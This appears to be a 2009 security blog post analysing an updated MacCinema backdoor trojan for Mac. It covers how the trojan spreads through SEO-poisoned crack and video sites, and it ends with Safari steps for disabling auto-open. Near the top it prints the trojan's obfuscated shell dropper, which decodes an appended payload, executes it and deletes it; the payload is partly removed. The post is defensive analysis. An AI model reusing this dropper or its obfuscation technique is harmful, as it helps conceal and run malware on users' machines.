Home > Malwares > Updated MacCinema

Updated MacCinema

Last week,  I have spotted a modified version of MacCinema. It was not significant, the modification was purely to avoid scanners detection.

The script looks like this:

#!/bin/sh
if [ $# != 1 ]; then type=0; else type=1; fi && tail -53 $0 | sed 's/lala/nigeb/' |  sed '/\n/!G;s/\(.\)\(.*\n\)/&\2\1/;//D;s/.//' | tail -r | uudecode -o /dev/stdout | sed 's/applemac/AdobeFlash/' | sed 's/bsd/7037/' | sed 's/gnu/'$type'/' >`uname -p` && sh `uname -p` && rm `uname -p` && exit
dne
`
``@"R5V9IY&(W<S-@H68H)78S178F%F"-EC)95D(&!F*J44,G@214%$*H
"%$8X0"*"93505D*U4%+T,44O@2-\@5,F`F0J02(`AB0!!&.B@"2J040PH03M
****content removed****
LU"(B%&=N]F<C!6/T-7:X5F"B,G;)UR9UQ&4@079N)79TY62ODG<A)G8IQT+M
BT#:T%&<*(R8AU69L!'<A)2/,ED5%I@(R@C+T8C+S83,N,3,R(2/21$1!!52M
agazagiz 666 lala

Anyway, this backdoor trojan is massively distributed around the internet. It uses Google SEO, so most users stumbled to these malicious sites from Google search.

Some lures Mac users promising free downloads of full version softwares, cracks, serials, activators, generators, keys, fixes – just like the screenshot below.   crack

…while other links to Mac videos like this PornTube below.

Porntube

There are malware serving sites that is bit aggressive, where it does not ask user to download the DMG files instead it automatically downloads and mounts – as it is turned on by default, you can disable automount by following this instruction:

1. Open Safari

2. Open “Preferences” under the “Safari” menu

3. Click on the “General” tab

4. Un-check the “Open ’safe’ files after downloading” box

5. Close Safari’s preferences

This instruction has been previously discussed here.

Stay safe!

  1. Antoine B.
    June 18, 2009 at 3:57 pm

    Hi,

    How is MacCinema installed in the case of the Album Cover Application? The application just needs to be dragged into the Application folder, there is no installer package like before! Is it possible also that my Norton cannot see that!

    Big problem here!

  1. No trackbacks yet.

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s

%d bloggers like this: